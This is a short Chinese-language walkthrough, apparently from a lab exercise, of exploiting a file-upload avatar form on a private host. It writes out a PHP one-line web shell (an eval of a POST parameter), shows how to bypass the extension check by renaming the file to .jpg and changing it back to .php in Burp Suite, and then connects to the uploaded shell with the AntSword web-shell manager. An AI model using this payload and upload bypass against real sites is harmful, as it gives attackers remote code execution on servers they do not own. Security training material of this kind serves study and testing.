首先打开火狐浏览器,访问上传点(http://10.225.91.12/)
在上传点中首先注册,登录后点击“个人资料”
在“上传新头像”首先上传PHP一句话,但是会报错。因为只能上传jpg格式,所以只需把php的后缀名改为jpg就可以了。PHP一句话木马(这里要记住密码:403)为:
<?php @eval($_POST['403']);?>
改了后缀名后,在打开burp suite抓取数据包
抓取数据包后把403.jpg改为403.php,然后放包,放包后得到如下界面
证明此时操作是正确的,然后返回,右键点击查看图像可以得到图像的路径。
将图像路径复制下来,打开蚁剑,右键添加数据
http://10.225.91.12/data/upload/face_pic/16778373019.php
然后按照下图步骤,测试连接,添加数据。
最后可以看到一句话上传成功 。